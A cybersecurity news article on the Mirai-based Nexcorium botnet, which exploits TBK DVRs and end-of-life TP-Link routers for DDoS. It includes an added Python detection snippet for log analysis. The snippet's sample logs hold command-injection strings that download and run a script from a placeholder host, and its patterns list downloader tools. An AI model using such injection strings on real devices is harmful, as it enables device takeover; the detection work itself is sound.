Mirai Variant Nexcorium Exploits CVE-2024-3721 to Take Over TBK DVRs for DDoS Botnet Operations

Cybersecurity researchers have uncovered a new wave of attacks where threat actors are exploiting vulnerabilities in TBK digital video recorders and outdated TP-Link routers to deploy a powerful Mirai-based botnet. The findings were reported by Fortinet FortiGuard Labs and Palo Alto Networks Unit 42.

Exploitation of TBK DVR Devices

The attack specifically targets TBK DVR systems by abusing CVE-2024-3721, a medium-severity flaw affecting models DVR-4104 and DVR-4216. This vulnerability allows attackers to inject malicious commands remotely and install a Mirai-based malware variant known as Nexcorium.

Security expert Vincent Li explained that IoT devices have become prime targets due to weak security practices, lack of updates, and widespread deployment. Attackers continue to rely on known vulnerabilities to gain initial access and spread malware capable of launching large-scale distributed denial-of-service attacks.

Growing Use of Mirai-Based Botnets

This is not the first time this vulnerability has been exploited. Over the past year, attackers have used it to spread multiple botnets, including Mirai variants and a newer threat known as RondoDox. Additionally, researchers have linked similar campaigns to loader-as-a-service operations that distribute various malware families across IoT devices and enterprise systems.

How the Nexcorium Attack Works

The attack chain begins with exploitation of the DVR vulnerability, allowing attackers to deploy a downloader script. This script identifies the system architecture and installs the appropriate malware payload.

Once active, the malware displays a message indicating control has been taken. It shares structural similarities with Mirai, including encoded configuration tables, monitoring components, and DDoS attack modules.

Advanced Capabilities and Persistence

Nexcorium is equipped with additional exploitation capabilities, including targeting CVE-2017-17215, which affects Huawei HG532 devices. The malware also uses built-in credential lists to perform brute-force attacks via Telnet.

If access is gained, the malware:

  • Obtains a system shell
  • Establishes persistence using system services
  • Connects to command-and-control servers
  • Launches DDoS attacks using UDP, TCP, and SMTP protocols

To avoid detection, it removes traces of its installation after successfully infecting the system.
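As an added, defender-side illustration (not code from the Fortinet or Unit 42 reports): the detection logic below runs over constructed DVR web-access and Telnet log lines and flags two stages of the chain described above, a request that pairs a shell metacharacter with a download utility (the command-injection-plus-downloader stage) and a source with repeated Telnet login failures (the credential brute-force stage). The endpoint path, addresses and log formats are placeholders, not the real vulnerable URL or vendor log format.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample logs (not real campaign data). The path /cgi/PLACEHOLDER and the
# addresses are placeholders standing in for the DVR web interface and attacker hosts.
HTTP_LOG = """\
203.0.113.5 - - "GET /login.htm HTTP/1.1" 200
203.0.113.9 - - "GET /cgi/PLACEHOLDER?cmd=%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.sh%3Bsh%20x.sh HTTP/1.1" 200
203.0.113.9 - - "GET /cgi/PLACEHOLDER?cmd=%60curl%20198.51.100.7%2Fbot.arm7%60 HTTP/1.1" 200
198.51.100.2 - - "GET /index.htm HTTP/1.1" 200
"""
TELNET_LOG = """\
telnetd: login failed for root from 203.0.113.9
telnetd: login failed for admin from 203.0.113.9
telnetd: login failed for root from 203.0.113.9
telnetd: login failed for default from 203.0.113.9
telnetd: login succeeded for root from 203.0.113.9
telnetd: login failed for admin from 198.51.100.2
"""

# Shell metacharacters that break out of a parameter value, and the fetch/execute
# utilities a downloader stage typically relies on in a stripped-down IoT firmware.
INJECTION = re.compile(r"[;|`&]|\$\(")
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|busybox|chmod|sh)\b")
HTTP_LINE = re.compile(r'^(\S+) .*"(?:GET|POST) (\S+) HTTP')
TELNET_FAIL = re.compile(r"login failed for (\S+) from (\S+)")

def find_injection_attempts(log: str) -> list[tuple[str, str]]:
    """Return (source_ip, decoded_request) for requests whose query string combines
    a shell metacharacter with a download/execute utility."""
    hits = []
    for line in log.splitlines():
        m = HTTP_LINE.match(line)
        if not m:
            continue
        src, path = m.group(1), unquote(m.group(2))  # decode %xx before matching
        query = path.partition("?")[2]
        if INJECTION.search(query) and DOWNLOADER.search(query):
            hits.append((src, path))
    return hits

def find_telnet_bruteforce(log: str, threshold: int = 3) -> dict[str, int]:
    """Return {source_ip: failed_logins} for sources with at least `threshold` failures."""
    fails = Counter(m.group(2) for m in map(TELNET_FAIL.search, log.splitlines()) if m)
    return {ip: n for ip, n in fails.items() if n >= threshold}
```

Both functions return the source address, so a hit can be correlated across the two logs: here the same placeholder host appears in the injection attempts and in the Telnet failures, which is exactly the overlap an analyst would pivot on.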

Threat to End-of-Life TP-Link Routers

Researchers from Unit 42 also identified active attempts to exploit CVE-2023-33538, a high-severity flaw affecting unsupported TP-Link routers. Although current attack attempts appear flawed, the vulnerability itself remains valid and dangerous.

This flaw has been officially listed in the Known Exploited Vulnerabilities catalog by the Cybersecurity and Infrastructure Security Agency (CISA), highlighting its real-world risk.

Affected models include:

  • TL-WR940N (v2, v4)
  • TL-WR740N (v1, v2)
  • TL-WR841N (v8, v10)

Attackers are attempting to deploy Mirai-like malware variants that can self-update and spread across networks by acting as web servers.
